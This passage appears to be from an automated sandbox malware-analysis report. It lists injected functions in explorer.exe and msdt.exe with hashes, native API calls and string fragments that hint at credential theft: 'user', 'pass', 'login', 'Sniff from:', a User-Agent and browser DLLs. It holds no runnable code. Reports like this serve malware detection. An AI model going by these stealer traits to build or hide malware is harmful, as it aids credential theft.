Instruction Fuzzy Hash: EE9190706187488FDB18EFA8D444BEEB7F2FB88704F40462DD48AD7251EB7099958785

Uniqueness

Uniqueness Score: -1.00%

Function 0E16D352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 0E16D3B0
, xrefs: 0E16D47C
v, xrefs: 0E16D4A0
n, xrefs: 0E16D3E7
e, xrefs: 0E16D48E

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: ec47a103d67e7919e1cc5ebc9daa31ee4acc1cabda3d708b2476b3252302a128
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 4471A271618B498FD758EFA8D4847AAB7F1FF98304F00062ED48AC7221EB71DD858B85

Uniqueness

Uniqueness Score: -1.00%

Function 0E168C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 0E168C64
l32., xrefs: 0E168C97
dll, xrefs: 0E168C9E
shel, xrefs: 0E168C90
ole3, xrefs: 0E168C5D

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: c1e975ad6586e27623a5ab6e80148bbe546b18bbf0755c21aed3dce4e06f433d
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: F25140B0918B4C8FDB54EF64C0456EEB7F1FF58300F404A2E959AE7214EF7095919B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0E16986F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

\, xrefs: 0E1699E0
4, xrefs: 0E1699E9
dll, xrefs: 0E1698F4
ion., xrefs: 0E1698EC
vers, xrefs: 0E1698E4

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 859a08ab2aad39b3dd31d2ac622a77032808bd6e91069955bf07b68e12d8df31
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: DB415E30218B4C8BCB75EF2898557EAB7E5FB99301F50462E999EC7240EF30D9958782

Uniqueness

Uniqueness Score: -1.00%

Function 0E16B4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 0E16B515
user, xrefs: 0E16B4D3
32.d, xrefs: 0E16B4DA
dll, xrefs: 0E16B51C
sspi, xrefs: 0E16B50E

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 03e1d0af5d5977bdd8725b539a931b4f9a5fde8294df65dafdafd13dbdf44fd4
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: B4418D70A19E0D8FCB98EF68C095BEE73E5FB58304F54456AA84ED7201DB70C9918BC6

Uniqueness

Uniqueness Score: -1.00%

Function 0E169432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 0E16952A
.dll, xrefs: 0E16953F
el32, xrefs: 0E169537
h, xrefs: 0E16951F

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: dde6c15de0ed5994e7860dc13942a84ac29a5b88ec6f4d4b9d14965e742043be
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 10414D70608B488FDB69DF2984943AAB7E1FB98304F244A6F949AC3255DB70C995CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0E1700B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 0E170146
Snif, xrefs: 0E170154
, xrefs: 0E170184
f fr, xrefs: 0E17013D

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: e80b231f3d3d6d192bccda48302ae02ddbf6c39e31a860d2dac4957d68061ac1
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 8B31BE71509B886FD71AEB28C4846DAB7E4FB94300F504D1EE4DBC7251EB31A98ACA43

Uniqueness

Uniqueness Score: -1.00%

Function 0E1700C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 0E170146
Snif, xrefs: 0E170154
, xrefs: 0E170184
f fr, xrefs: 0E17013D

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: a6969f404e29adf29d8710dc8b296c890d6e2ba8f88c3d37e1ed6bcc21488d58
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: A331AD71508B486FD719EB28C4846EAB7E5FB94300F50491EE4DBC7251EB31E9868A43

Uniqueness

Uniqueness Score: -1.00%

Function 0E16BFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

me_c, xrefs: 0E16BFEE
.dll, xrefs: 0E16BFFE
chro, xrefs: 0E16C023
hild, xrefs: 0E16BFF6

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 8af5732629e95db1ae09a09dae4ee1fbfa97db55f2dfcc6a6f531152f701bec6
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 89316170218B484FCB94EF688494BAAB7E1FF98700F944A6D948ECB255DF30DD85C792

Uniqueness

Uniqueness Score: -1.00%

Function 0E16BFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

me_c, xrefs: 0E16BFEE
.dll, xrefs: 0E16BFFE
chro, xrefs: 0E16C023
hild, xrefs: 0E16BFF6

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 2a4a27acbcc955287f73f522071b83bb8892cfd8eee24fc0166539d611148150
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 59316270218B484FCB94EF688494BAAB7E1FF98700F944A6D948ECB255DF30CD85C792

Uniqueness

Uniqueness Score: -1.00%

Function 0E16E8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0E16E935, 0E16E948
urlmon.dll, xrefs: 0E16E959
on.d, xrefs: 0E16E902
nt: , xrefs: 0E16E91E

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 873086a7de5019207c82d7e3970659f2f9567a1c447c31791c0d6655950bbcb1
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 1431A031614A0D8BCB44EFA8C8847EEB7F1FF58614F40462AD49ED7240EF748A85878A

Uniqueness

Uniqueness Score: -1.00%

Function 0E16E8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0E16E935, 0E16E948
urlmon.dll, xrefs: 0E16E959
on.d, xrefs: 0E16E902
nt: , xrefs: 0E16E91E

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 59a0d933d29de6fa8786e5549e412ff23e3336d94bd2e09ba747ca514db47da4
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: CB21B670614A4D8BCF45EFA8C8847EE7BF1FF58604F40461AD49AD7240EF748A85C785

Uniqueness

Uniqueness Score: -1.00%

Function 0E16FE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E16FF26
l, xrefs: 0E16FF03
., xrefs: 0E16FF1F
t, xrefs: 0E16FEF4

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 74fdccc87ad04372ee05fba90935d18b04e575b129cd40d959ecdd0e41a4aff2
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: CF217C70A24A0D9BDB08EFA8D0447EEBBF1FF18304F504A2ED089E3600DB749991CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0E16FE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E16FF26
l, xrefs: 0E16FF03
., xrefs: 0E16FF1F
t, xrefs: 0E16FEF4

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: ad842ca716b79670600dc529a84515972ea9054fb42404e078dc79ab34e3e1cb
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: AD216D70A24A0D9FDB44EFA8D0447AEBAF1FF58304F504A2ED049D3610DB749991CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0E16FFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 0E170022
auth, xrefs: 0E17002F
user, xrefs: 0E170015
logi, xrefs: 0E17003C

Memory Dump Source

Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e080000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: bd5e59bf89e6b1100eef20f9319c8e9f626c23013c29247c84b6f24585c3cd4b
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 5821CD30624B0D8BCB05DF9998906EEB7F2EF88354F104A19E44AEB244D7B1D9948BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msdt.exePID: 5148, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	592
Total number of Limit Nodes:	68

Executed Functions

Function 0059A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00594BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00594BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0059A39D

Strings

.z`, xrefs: 0059A38D, 0059A398

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: a64f79811fd4fd6a25815206bb26e48473fd3450118aeee5392e05dd7b648da1
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: D7F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0059A3FB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!JY,FFFFFFFF,?,bMY,?,00000000), ref: 0059A445

Strings

!JY, xrefs: 0059A41C, 0059A428

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JY
API String ID: 2738559852-3740252954
Opcode ID: e0f23ac7f3dc0e11a63064dcbe2e43e740a231549accae759e6d5e1f4bbbd549
Instruction ID: 4124930f3bd7f010415f4499e3a7043a77f0fa491665e8861fa160f96f7598e4
Opcode Fuzzy Hash: e0f23ac7f3dc0e11a63064dcbe2e43e740a231549accae759e6d5e1f4bbbd549
Instruction Fuzzy Hash: 07F0E2B6200108AFCB14DF99CC90EEB7BA9EF8C354F158248FA1DE7251C630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0059A400 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!JY,FFFFFFFF,?,bMY,?,00000000), ref: 0059A445

Strings

!JY, xrefs: 0059A41C, 0059A428

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JY
API String ID: 2738559852-3740252954
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: dead070daef5bb03676c35ba3e26fcdd8e0f5054ab97da070c267558a1e828a8
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 80F0A4B6200208AFCB14DF89DC85EEB77ADAF8C754F158248BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0059A47A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(@MY,?,?,00594D40,00000000,FFFFFFFF), ref: 0059A4A5

Strings

@MY, xrefs: 0059A49C, 0059A4A4

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: Close
String ID: @MY
API String ID: 3535843008-3636169930
Opcode ID: f1ba07d1239d12174b365b41a98837ef37e76964a0f95b483b0aff5f8c168866
Instruction ID: ae5db2f502a6d6b72860e7568549f846e0948ef63028f75aa2db063d6d46a5d1
Opcode Fuzzy Hash: f1ba07d1239d12174b365b41a98837ef37e76964a0f95b483b0aff5f8c168866
Instruction Fuzzy Hash: 0BE0EC766002106BDB14EBA8CC89EE77F58EF45360F1545A9B95D9B242D531E50087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0059A480 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(@MY,?,?,00594D40,00000000,FFFFFFFF), ref: 0059A4A5

Strings

@MY, xrefs: 0059A49C, 0059A4A4

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: Close
String ID: @MY
API String ID: 3535843008-3636169930
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 452bbe96fc2dd4372194c0741c98d15089b63c88932f6367da2de8d4f8f70966
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: CAD01776200214ABDB10EB98CC89EA77BACEF88760F154499BA1C9B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0059A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00582D11,00002000,00003000,00000004), ref: 0059A569

Memory Dump Source

Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_msdt.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: d8e0d27b42524a7a89c1b7555d6b4a74c28e2771d8d294964fc56d79602b1a82
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: D1F015B6200208AFCB14DF89CC81EAB77ADAF88754F118148BE1C97241C630F810CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 04B09860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0986A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 97cd252a309a1ed6a1e416d603f44c9a6e3378c7f8c29d2ee1ebec8f6c31fc14
Instruction ID: 4eb25103c60e4f6ce8f03cd2fe8ba932e9d122d31648f0815a42afed0ab7257d
Opcode Fuzzy Hash: 97cd252a309a1ed6a1e416d603f44c9a6e3378c7f8c29d2ee1ebec8f6c31fc14
Instruction Fuzzy Hash: CB90027220105413F21161594504707040DD7D0285FD1C866A0415559D9696E962B161

Uniqueness

Uniqueness Score: -1.00%

Function 04B09840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0984A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 148045f9a12e4d66be6db46f36fb138837454c9d07cca08103ca7ca6d7667147
Instruction ID: 30b1161517db8187cde22b4c71a6f0a2c6770162dc03e37cf0c1711067c91044
Opcode Fuzzy Hash: 148045f9a12e4d66be6db46f36fb138837454c9d07cca08103ca7ca6d7667147
Instruction Fuzzy Hash: E6900262242091527645B1594404507440AE7E02857D1C466A1405951C8566F866E661

Uniqueness

Uniqueness Score: -1.00%

Function 04B099A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B099AA

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6642935c99e2bc94ba30be921c23638264888a5a330d65613d3c8d9d4e69b765
Instruction ID: 5e54396f7144814f222ac6990661e9a59fc7a2d7730a2a9d74281331bb073c2b
Opcode Fuzzy Hash: 6642935c99e2bc94ba30be921c23638264888a5a330d65613d3c8d9d4e69b765
Instruction Fuzzy Hash: AE9002A234105442F20061594414B060409D7E1345F91C469E1055555D8659EC627166

Uniqueness

Uniqueness Score: -1.00%

Function 04B095D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B095DA

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 832331e43084c859585cbce67e133f893d1c4cd600af0507feffa655a1eb72bc
Instruction ID: 7e3193b36c45c4e7313d3f75ec813bb31eae64c537b39d7d4de3704e5bd5864c
Opcode Fuzzy Hash: 832331e43084c859585cbce67e133f893d1c4cd600af0507feffa655a1eb72bc
Instruction Fuzzy Hash: 3E9002A220205003620571594414616440ED7E0245B91C475E1005591DC565E8A17165

Uniqueness

Uniqueness Score: -1.00%

Function 04B09910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0991A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 634121e1d24c7ddbdd18342af3e2a9b6b12084d1f83fe874be882c6b9ebaa29b
Instruction ID: 2fedbcb97d90651ca2b7cd5dbb6685a74c4b8b133853260e88ce0ac8a4156947
Opcode Fuzzy Hash: 634121e1d24c7ddbdd18342af3e2a9b6b12084d1f83fe874be882c6b9ebaa29b
Instruction Fuzzy Hash: 489002B220105402F240715944047460409D7D0345F91C465A5055555E8699EDE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04B09540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B0954A

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6386f9c375db35895a9b1410ebf54e1c5444980f295a29cc474fff0cfabcdbd
Instruction ID: a8bd66cb0c326fca2cac010c999814f9e6cf62c0b5e97858b30b650b6666ca9f
Opcode Fuzzy Hash: b6386f9c375db35895a9b1410ebf54e1c5444980f295a29cc474fff0cfabcdbd
Instruction Fuzzy Hash: 45900266211050032205A5590704507044AD7D5395391C475F1006551CD661E8716161

Uniqueness

Uniqueness Score: -1.00%

Function 04B096E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B096EA

Memory Dump Source

Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true

Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f87ab3e9b84ec41a69789e15ac7959eb9491bac0163e20430dbc2fc4ef43eef1
Instruction ID: f70d4f711a719384e1a56d746d748b4a85e185275b2d1795fb8abb23f8903206
Opcode Fuzzy Hash: f87ab3e9b84ec41a69789e15ac7959eb9491bac0163e20430dbc2fc4ef43eef1
Instruction Fuzzy Hash: 009002722010D802F2106159840474A0409D7D0345F95C865A4415659D86D5E8A17161

Uniqueness

Uniqueness Score: -1.00%

